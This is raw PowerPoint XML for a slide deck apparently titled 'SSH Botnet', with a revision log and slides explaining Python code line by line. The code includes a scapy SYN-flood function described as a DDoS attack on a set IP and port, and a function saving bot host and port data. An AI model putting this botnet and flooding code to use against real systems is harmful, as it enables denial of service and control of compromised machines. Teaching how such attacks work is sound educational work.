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9E3C9-FCB2-465D-A44D-275539C5E6A4}" v="118" dt="2024-07-26T23:46:39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зар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}"/>
    <pc:docChg chg="addSld delSld modSld">
      <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:46:38.734" v="96" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:43:27.112" v="9"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3930024240" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:43:23.440" v="8" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3930024240" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:43:27.112" v="9"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3930024240" sldId="256"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:43:43.800" v="15" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3589545563" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:43:38.331" v="14"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3589545563" sldId="257"/>
            <ac:spMk id="2" creationId="{143D1423-E6F6-9930-07E3-50C0C5DF47C1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:43:43.800" v="15" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3589545563" sldId="257"/>
            <ac:spMk id="3" creationId="{447C7E2B-915F-1CDF-AE39-3283A8DF759F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:02.192" v="23" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4261876413" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:43:57.364" v="20"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4261876413" sldId="258"/>
            <ac:spMk id="2" creationId="{F3946F4D-8FA8-5A28-F7ED-6ABF5537B069}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:02.192" v="23" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4261876413" sldId="258"/>
            <ac:spMk id="3" creationId="{109D2C18-29F0-C59E-2F9B-28EAAEC3D9A2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:16.474" v="29" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2810563475" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:14.849" v="28"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2810563475" sldId="259"/>
            <ac:spMk id="2" creationId="{D268109D-8088-5B05-1CD3-C5C29722665E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:16.474" v="29" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2810563475" sldId="259"/>
            <ac:spMk id="3" creationId="{9B1DDAF8-B95F-BB58-2E09-27F26ABA9334}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:25.928" v="34" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1471458082" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:23.912" v="33"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1471458082" sldId="260"/>
            <ac:spMk id="2" creationId="{7297978C-4AAB-D842-0A31-84AADC7C27C0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:25.928" v="34" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1471458082" sldId="260"/>
            <ac:spMk id="3" creationId="{F15F17B1-D834-3D1A-5690-5245A25FADFD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:41.414" v="41" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2092326823" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:35.694" v="39"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092326823" sldId="261"/>
            <ac:spMk id="2" creationId="{78408862-2036-0931-519F-230E4E09F650}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:41.414" v="41" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092326823" sldId="261"/>
            <ac:spMk id="3" creationId="{9770E7EC-74E4-3D52-90B9-AF7667750FE0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:54.539" v="48" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2801366909" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:51.274" v="46"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2801366909" sldId="262"/>
            <ac:spMk id="2" creationId="{8AEC5FE9-759B-9A30-577E-B2D6FB2AFC0F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:44:54.539" v="48" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2801366909" sldId="262"/>
            <ac:spMk id="3" creationId="{D35A3E04-08BB-DF12-5AB4-381B1145779F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:45:08.775" v="55" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3017369961" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:45:04.696" v="53"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3017369961" sldId="263"/>
            <ac:spMk id="2" creationId="{7F15EBB6-6C9F-9DD6-C1AC-054225035A7A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:45:08.775" v="55" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3017369961" sldId="263"/>
            <ac:spMk id="3" creationId="{763CF0EC-9DBE-4EE2-6CC1-A6D0E8B44146}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:45:24.073" v="62" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4149824984" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:45:20.729" v="60"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4149824984" sldId="264"/>
            <ac:spMk id="2" creationId="{EAA0B029-DC96-F4A7-C5BA-31FA74525F66}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:45:24.073" v="62" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4149824984" sldId="264"/>
            <ac:spMk id="3" creationId="{A67BF689-D4E2-3F31-68D1-116746576DFD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new del">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:45:42.261" v="70" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2000548303" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:45:39.011" v="68"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2000548303" sldId="265"/>
            <ac:spMk id="2" creationId="{70C9318E-EBEE-24B2-9750-FB81762D7D3D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:45:42.261" v="70" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2000548303" sldId="265"/>
            <ac:spMk id="3" creationId="{8C3E7B9B-5D09-2000-9104-8A461F7524F8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:45:53.965" v="76" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1478465594" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:45:50.106" v="74"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1478465594" sldId="266"/>
            <ac:spMk id="2" creationId="{457026F9-75D1-6C9F-6818-3206AA587E19}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:45:53.965" v="76" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1478465594" sldId="266"/>
            <ac:spMk id="3" creationId="{5F1D04B5-21ED-B8A9-17B5-B21C6152C9D6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:46:08.466" v="83" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3791497247" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:46:04.403" v="81"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3791497247" sldId="267"/>
            <ac:spMk id="2" creationId="{85DEBB45-2E9D-7987-EADE-FECBEF1DD37B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:46:08.466" v="83" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3791497247" sldId="267"/>
            <ac:spMk id="3" creationId="{38D6A32C-626B-DD25-5535-6EA2E55B1263}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:46:38.734" v="96" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="79416658" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:46:24.764" v="88"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="79416658" sldId="268"/>
            <ac:spMk id="2" creationId="{3451D8A4-8619-2CC6-42C5-82CFDF66B3A7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:46:21.155" v="87"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="79416658" sldId="268"/>
            <ac:spMk id="3" creationId="{89D56206-2C2A-B71A-E980-076978DBA854}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{EAC9E3C9-FCB2-465D-A44D-275539C5E6A4}" dt="2024-07-26T23:46:38.734" v="96" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="79416658" sldId="268"/>
            <ac:spMk id="4" creationId="{2516E4EB-5A98-0204-56B6-DA51FADE6F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26.07.2024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26.07.2024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26.07.2024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26.07.2024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26.07.2024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26.07.2024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26.07.2024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26.07.2024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26.07.2024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26.07.2024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26.07.2024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26.07.2024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SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1"/>
              <a:t>Botnet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C3E7B9B-5D09-2000-9104-8A461F75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10" y="237532"/>
            <a:ext cx="11234871" cy="535546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uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>def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command_for_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>():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Defines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</a:rPr>
              <a:t>command_for_all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function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perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> a DDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attack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/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>target_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = "192.168.10.140"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Sets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target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>address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target_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = 80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Sets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target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port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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = IP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>target_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Creates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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>packet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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = TCP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>sport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>RandShort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>target_port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flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>="S")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Creates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> a TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>packet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with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random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source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port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and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>flag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raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Raw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b"X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>" * 1024)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Creates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raw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payload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1024 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bytes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>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>p = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>raw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Combines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IP, TCP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>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raw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payload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one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packet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send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(p, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>loop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>verbose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=1)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Sends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packet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loop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>with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verbose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output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0054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F1D04B5-21ED-B8A9-17B5-B21C6152C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08" y="223289"/>
            <a:ext cx="10850310" cy="5284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b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>def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save_botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>():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Defines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</a:rPr>
              <a:t>save_botnet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function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save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botnet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file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botnet_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = [{'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'], '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>': </a:t>
            </a:r>
            <a:r>
